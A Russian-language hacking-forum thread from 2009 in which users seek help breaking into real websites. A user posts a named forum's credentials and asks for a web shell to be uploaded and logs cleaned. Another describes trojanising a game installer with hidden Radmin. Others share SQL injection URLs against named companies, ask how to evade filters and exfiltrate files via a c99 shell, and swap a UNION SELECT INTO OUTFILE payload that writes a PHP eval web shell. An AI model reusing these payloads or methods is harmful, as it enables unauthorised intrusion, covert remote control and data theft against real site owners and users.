Ваши вопросы по уязвимостям.

Discussion in 'Уязвимости' started by darky, 4 Aug 2007.

Thread Status:
Not open for further replies.
  1. Kardinal_777

    Kardinal_777 New Member

    Joined:
    16 Jan 2009
    Messages:
    1
    Likes Received:
    0
    Reputations:
    0
    Помогите залить шелл

    http://torrent.vstrezhevom.ru/forum/
    Логин [TM]*SH@RK
    Пасс 123456

    Народ помогите пожалуйста залить шелл и скажите плизз как почистить логи!!!! прошу!
     
  2. Neponomat

    Neponomat New Member

    Joined:
    23 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    ну например скачал я игру в ехе и запустил установку, а в ехешнике игры находится радмин и файл реестра который делает скрытым присутствие радмина и устанавливает свой пароль, и сразу же после запуска файла реестра, запускается ещё одна скрытая программа, которая нажимает ДА для того чтобы данные были внесены, и поэтому запуск файла реестра не вызывает подозрения, ведь он сам запустился. короче говоря былобы не плохо если есть микро прога которая автоматом жмёт кнопку ентер два раза подряд
    Во :)
     
  3. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    фаэрвол будет ругаться и антивирус
     
  4. Neponomat

    Neponomat New Member

    Joined:
    23 Jan 2009
    Messages:
    11
    Likes Received:
    0
    Reputations:
    0
    ну незнаю почему он должен ругаться?? ладно фаервол крикнет ченить, но ведь игра устанавливается, значит так надо для игры :) а антивирус то чего будет кричать? яу меня вон установлен нод 32 так я реестр скопировал а потом запускаю его и ничего не кричит, да и с чего вдруг ему кричать? ;)
     
  5. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Откуда ему взятся
    http://www.technodom.kz/admin/

    Authorization: Basic
     
    2 people like this.
  6. none222

    none222 Guest

    Reputations:
    0
    jokester, базовую авторизацию мона и в скрипте реалиховать, не обязательно это настройка апача ;-)
     
  7. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Конечно можно, можно даже эмулировать инъекцию, и выдавать абсолютно левые результаты. Но мы ведь реалисты, верно? :)
     
    1 person likes this.
  8. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    он будет говорить,что это троян!Даже бат он распознает как троя!
     
  9. Велемир

    Joined:
    19 Jun 2006
    Messages:
    1,123
    Likes Received:
    96
    Reputations:
    -25
    Нужен человек,который очень хорошо разбирается в SQL inj ).Нужен,так сказать,консалтинг чтоли,ибо в паблик кидать - спалюсь.Кину в ПМ )
     
  10. MaSTeR GэN

    MaSTeR GэN Member

    Joined:
    23 May 2008
    Messages:
    102
    Likes Received:
    54
    Reputations:
    7
    ПМ погомогу :) А лучше в icq найдешь её когда стукнеш в ПМ :)
     
  11. molotovkeyt

    molotovkeyt Member

    Joined:
    2 Nov 2008
    Messages:
    2
    Likes Received:
    8
    Reputations:
    -1
    http://www.exportbureau.com/trade_leads.html?lead=99999999999999999999999999
    Дальше стоит фильтрация на order by и union select
    Че делать?

    http://www.tbc-world.com/resprofile.asp?id=-5685946+order+by+25--&lng=en&companytype=2
    Вот еще одна конторка. по моему тоже фильтрация стоит.
     
    #4951 molotovkeyt, 24 Jan 2009
    Last edited: 24 Jan 2009
  12. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    Народ есть шелл с99 от маднета
    так вот нужно слить все файлы с сайта (знаю что обсуждался такой вопрос тут)
    но на сервере стоит виндувс 2008 как тут тогда быть?
     
  13. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    molotovkeyt, первая ссылка не открывается, вторая:
     
    1 person likes this.
  14. AkyHa_MaTaTa

    AkyHa_MaTaTa Elder - Старейшина

    Joined:
    19 Mar 2007
    Messages:
    557
    Likes Received:
    306
    Reputations:
    27
    Вот, не помню кто вылаживал, скрипт на пхп,http://slil.ru/26579035. Еще можно попробывать архиваторы из unix - версии под windows,например tar, но я хз будет ли он работать под 2008.
     
    1 person likes this.
  15. diznt

    diznt Elder - Старейшина

    Joined:
    31 Jan 2008
    Messages:
    432
    Likes Received:
    164
    Reputations:
    -19
    вот еще что,
    есть сайт, и если пройти по сылке sait.ru/upload.php?id=64 (сам файл)
    то начнеться скачка файла, можно ли как нибуть скачать конфиг.пхп (выйдя за каталоги(если такое можно))
    ???
    Кусочек кода при катором начинается скачка

    Code:
    <?php
    
    include_once("init.php");
    
    $GLOBALS['db']->Execute("SET NAMES utf8"); 
    $st = $GLOBALS['db']->Prepare("SELECT `filename`, `origname` FROM ".DB_PREFIX."_demos WHERE demtype=? and demid=?");
    $res = $GLOBALS['db']->Execute($st,array($_GET['type'],$_GET['id']));
    header('Content-type: application/force-download');
    header('Content-Transfer-Encoding: Binary');
    header('Content-disposition: attachment; filename='.$res->fields[1]);
    @readfile(SAVE_FILES . "/" . $res->fields[0]);
    ?> 
    SAVE_FILES - путь откуда скачиваються файл
     
  16. _evgeniy_

    _evgeniy_ Member

    Joined:
    7 Sep 2008
    Messages:
    25
    Likes Received:
    11
    Reputations:
    5
    неполучится скачать, нет SQL-инекции в запросе
     
  17. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'shell.php'

    тоже нужно переводить в чар?
     
    #4957 kevmen, 25 Jan 2009
    Last edited by a moderator: 25 Jan 2009
  18. l1ght

    l1ght Elder - Старейшина

    Joined:
    5 Dec 2006
    Messages:
    191
    Likes Received:
    678
    Reputations:
    333
    первая сточка

    необязательно (левая часть)
     
    #4958 l1ght, 25 Jan 2009
    Last edited: 25 Jan 2009
    2 people like this.
  19. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Joined:
    18 Feb 2008
    Messages:
    1,038
    Likes Received:
    1,139
    Reputations:
    350
    Нужен путь. Так тоже зальёт, но в папку с базой, из веба не увидешь. В чар нельзя путь переводить

    '/путь/shell.php'
     
  20. kevmen

    kevmen Member

    Joined:
    29 Oct 2008
    Messages:
    147
    Likes Received:
    23
    Reputations:
    0
    http://localhost/view_cat.php?cat=-1+union+select+1,'<?php eval($_GET[‘sql’])?>',3,4,5,6,7,8,9+INTO+OUTFILE+'http://target/shell.php'

    так можно?jokester
     
    1 person likes this.
Thread Status:
Not open for further replies.